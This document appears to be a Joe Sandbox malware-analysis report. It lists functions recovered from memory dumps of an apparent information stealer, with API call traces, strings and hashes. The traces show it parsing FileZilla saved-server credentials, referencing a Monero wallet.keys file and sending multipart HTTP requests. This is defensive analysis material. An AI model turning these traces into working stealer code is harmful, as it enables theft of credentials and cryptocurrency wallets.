Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
Instruction ID: 8c2bd1f46042af4331dff5695dd1bf9af67209197da10ad2c688805e08b5f95d
Opcode Fuzzy Hash: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
Instruction Fuzzy Hash: 4F623DB5680200BFF745DFA8ED889563BF9F79C701734C51BA609C3224D63DA452EB2A

Function 00547710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00547724
RtlAllocateHeap.NTDLL(00000000), ref: 0054772B
lstrcat.KERNEL32(?,012794E8), ref: 005478DB
lstrcat.KERNEL32(?,?), ref: 005478EF
lstrcat.KERNEL32(?,?), ref: 00547903
lstrcat.KERNEL32(?,?), ref: 00547917
lstrcat.KERNEL32(?,0127DB68), ref: 0054792B
lstrcat.KERNEL32(?,0127DC70), ref: 0054793F
lstrcat.KERNEL32(?,0127DC28), ref: 00547952
lstrcat.KERNEL32(?,0127DD00), ref: 00547966
lstrcat.KERNEL32(?,0127DFF8), ref: 0054797A
lstrcat.KERNEL32(?,?), ref: 0054798E
lstrcat.KERNEL32(?,?), ref: 005479A2
lstrcat.KERNEL32(?,?), ref: 005479B6
lstrcat.KERNEL32(?,0127DB68), ref: 005479C9
lstrcat.KERNEL32(?,0127DC70), ref: 005479DD
lstrcat.KERNEL32(?,0127DC28), ref: 005479F1
lstrcat.KERNEL32(?,0127DD00), ref: 00547A04
lstrcat.KERNEL32(?,0127E060), ref: 00547A18
lstrcat.KERNEL32(?,?), ref: 00547A2C
lstrcat.KERNEL32(?,?), ref: 00547A40
lstrcat.KERNEL32(?,?), ref: 00547A54
lstrcat.KERNEL32(?,0127DB68), ref: 00547A68
lstrcat.KERNEL32(?,0127DC70), ref: 00547A7B
lstrcat.KERNEL32(?,0127DC28), ref: 00547A8F
lstrcat.KERNEL32(?,0127DD00), ref: 00547AA3
lstrcat.KERNEL32(?,0127E0C8), ref: 00547AB6
lstrcat.KERNEL32(?,?), ref: 00547ACA
lstrcat.KERNEL32(?,?), ref: 00547ADE
lstrcat.KERNEL32(?,?), ref: 00547AF2
lstrcat.KERNEL32(?,0127DB68), ref: 00547B06
lstrcat.KERNEL32(?,0127DC70), ref: 00547B1A
lstrcat.KERNEL32(?,0127DC28), ref: 00547B2D
lstrcat.KERNEL32(?,0127DD00), ref: 00547B41
lstrcat.KERNEL32(?,0127E130), ref: 00547B55
lstrcat.KERNEL32(?,?), ref: 00547B69
lstrcat.KERNEL32(?,?), ref: 00547B7D
lstrcat.KERNEL32(?,?), ref: 00547B91
lstrcat.KERNEL32(?,0127DB68), ref: 00547BA4
lstrcat.KERNEL32(?,0127DC70), ref: 00547BB8
lstrcat.KERNEL32(?,0127DC28), ref: 00547BCC
lstrcat.KERNEL32(?,0127DD00), ref: 00547BDF
lstrcat.KERNEL32(?,0127E198), ref: 00547BF3
lstrcat.KERNEL32(?,?), ref: 00547C07
lstrcat.KERNEL32(?,?), ref: 00547C1B
lstrcat.KERNEL32(?,?), ref: 00547C2F
lstrcat.KERNEL32(?,0127DB68), ref: 00547C43
lstrcat.KERNEL32(?,0127DC70), ref: 00547C56
lstrcat.KERNEL32(?,0127DC28), ref: 00547C6A
lstrcat.KERNEL32(?,0127DD00), ref: 00547C7E

Part of subcall function 005475D0: lstrcat.KERNEL32(35AAC020,005617FC), ref: 00547606
Part of subcall function 005475D0: lstrcat.KERNEL32(35AAC020,00000000), ref: 00547648
Part of subcall function 005475D0: lstrcat.KERNEL32(35AAC020, : ), ref: 0054765A
Part of subcall function 005475D0: lstrcat.KERNEL32(35AAC020,00000000), ref: 0054768F
Part of subcall function 005475D0: lstrcat.KERNEL32(35AAC020,00561804), ref: 005476A0
Part of subcall function 005475D0: lstrcat.KERNEL32(35AAC020,00000000), ref: 005476D3
Part of subcall function 005475D0: lstrcat.KERNEL32(35AAC020,00561808), ref: 005476ED
Part of subcall function 005475D0: task.LIBCPMTD ref: 005476FB

lstrcat.KERNEL32(?,0127E4D0), ref: 00547E0B
lstrcat.KERNEL32(?,0127D1B8), ref: 00547E1E
lstrlen.KERNEL32(35AAC020), ref: 00547E2B
lstrlen.KERNEL32(35AAC020), ref: 00547E3B

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: da60e9b2e40073bb155e6de9243f1c1fbbdfe467bfb2f538e412f2b11cf2ed65
Instruction ID: c9327bca343fde7ae3feb055aa7a8b2aff17a665fd3db9078ab283fec72d4d36
Opcode Fuzzy Hash: da60e9b2e40073bb155e6de9243f1c1fbbdfe467bfb2f538e412f2b11cf2ed65
Instruction Fuzzy Hash: 3C3244B2C40319A7D715EB60DC89DEA777CBB48701F448A8AF21962080EF78E789CF55

Function 00550250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A

Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52

GetProcessHeap.KERNEL32(00000000,000F423F,00560DBA,00560DB7,00560DB6,00560DB3), ref: 00550362
RtlAllocateHeap.NTDLL(00000000), ref: 00550369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00550385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550393
StrStrA.SHLWAPI(00000000,<Port>), ref: 005503CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 005503DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00550419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00550463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00550562
lstrcat.KERNEL32(?,profile: null), ref: 00550571
lstrcat.KERNEL32(?,url: ), ref: 00550580
lstrcat.KERNEL32(?,00000000), ref: 00550593
lstrcat.KERNEL32(?,00561678), ref: 005505A2
lstrcat.KERNEL32(?,00000000), ref: 005505B5
lstrcat.KERNEL32(?,0056167C), ref: 005505C4
lstrcat.KERNEL32(?,login: ), ref: 005505D3
lstrcat.KERNEL32(?,00000000), ref: 005505E6
lstrcat.KERNEL32(?,00561688), ref: 005505F5
lstrcat.KERNEL32(?,password: ), ref: 00550604
lstrcat.KERNEL32(?,00000000), ref: 00550617
lstrcat.KERNEL32(?,00561698), ref: 00550626
lstrcat.KERNEL32(?,0056169C), ref: 00550635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055068E

Strings

<User>, xrefs: 00550410
password: , xrefs: 005505FB
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 005502A4
<Pass encoding="base64">, xrefs: 0055045A
<Host>, xrefs: 0055037C
<Port>, xrefs: 005503C6
browser: FileZilla, xrefs: 00550559
url: , xrefs: 00550577
profile: null, xrefs: 00550568
login: , xrefs: 005505CA

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: fbcfe2c2afd7fef23b2ffdf99efbbf090dbe137b95a51ec8587f85dad002ba15
Instruction ID: 7144e8b5afa715012fec5cf7f5cb45ca5efb9c645185be7f9f8a380e8c735042
Opcode Fuzzy Hash: fbcfe2c2afd7fef23b2ffdf99efbbf090dbe137b95a51ec8587f85dad002ba15
Instruction Fuzzy Hash: 0FD14271900109ABDB04EBF0DDAADEE7B38FF54301F54851AF502A7091EF34AA49CB65

Function 00545100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849

lstrlen.KERNEL32(00000000), ref: 00545193

Part of subcall function 00558EA0: CryptBinaryToStringA.CRYPT32(00000000,00545184,40000001,00000000,00000000,?,00545184), ref: 00558EC0

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00545207
StrCmpCA.SHLWAPI(?,0127E570), ref: 00545225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00545340
HttpOpenRequestA.WININET(00000000,0127E580,?,0127DDD8,00000000,00000000,00400100,00000000), ref: 005453A4

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0127E510,00000000,?,01279DB8,00000000,?,005619DC,00000000,?,005551CF), ref: 00545737
lstrlen.KERNEL32(00000000), ref: 0054574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0054575C
RtlAllocateHeap.NTDLL(00000000), ref: 00545763
lstrlen.KERNEL32(00000000), ref: 00545778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005457A9
lstrlen.KERNEL32(00000000), ref: 005457C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005457E1
lstrlen.KERNEL32(00000000,?,?), ref: 0054580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00545822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0054584D
InternetCloseHandle.WININET(00000000), ref: 005458B1
InternetCloseHandle.WININET(00000000), ref: 005458BE
InternetCloseHandle.WININET(00000000), ref: 005458C8

Strings

------, xrefs: 005454F9
", xrefs: 005455C4
------, xrefs: 0054563B
--, xrefs: 00545280
------, xrefs: 00545297
", xrefs: 00545482
------, xrefs: 005453B7
", xrefs: 00545706

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: f3f2e88621f1c60abca2a325927b051dce8ce367dbc40777d201c79a1ec88ef2
Instruction ID: 077a2e937eec91c4cba5feba17dfcb113366d2947611c8fd0cae1782b7cb2759
Opcode Fuzzy Hash: f3f2e88621f1c60abca2a325927b051dce8ce367dbc40777d201c79a1ec88ef2
Instruction Fuzzy Hash: EA326272820119ABDB14EBA0DCA9FEE7778BF94701F50425AF50663092EF342A4DCF55

Function 0054A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0055AA70: StrCmpCA.SHLWAPI(01278A50,0054A7A7,?,0054A7A7,01278A50), ref: 0055AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0054AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0054AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0054ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054A8B0

Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

lstrcat.KERNEL32(?,00000000), ref: 0054ACEB
lstrcat.KERNEL32(?,00561320), ref: 0054ACFA
lstrcat.KERNEL32(?,00000000), ref: 0054AD0D
lstrcat.KERNEL32(?,00561324), ref: 0054AD1C
lstrcat.KERNEL32(?,00000000), ref: 0054AD2F
lstrcat.KERNEL32(?,00561328), ref: 0054AD3E
lstrcat.KERNEL32(?,00000000), ref: 0054AD51
lstrcat.KERNEL32(?,0056132C), ref: 0054AD60
lstrcat.KERNEL32(?,00000000), ref: 0054AD73
lstrcat.KERNEL32(?,00561330), ref: 0054AD82
lstrcat.KERNEL32(?,00000000), ref: 0054AD95
lstrcat.KERNEL32(?,00561334), ref: 0054ADA4
lstrcat.KERNEL32(?,00000000), ref: 0054ADB7
lstrlen.KERNEL32(?), ref: 0054AE0D
lstrlen.KERNEL32(?), ref: 0054AE1C

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

DeleteFileA.KERNEL32(00000000), ref: 0054AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0054ABD4

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: fcdc0b9fa917c0996d711619b74079f85a5837e79b26fecd3aa12fd1ccbb8450
Instruction ID: 868999dd73bf2a1ecd71bf8b7fe3439df227e27eba8ba9bbcf418c1bbf79651d
Opcode Fuzzy Hash: fcdc0b9fa917c0996d711619b74079f85a5837e79b26fecd3aa12fd1ccbb8450
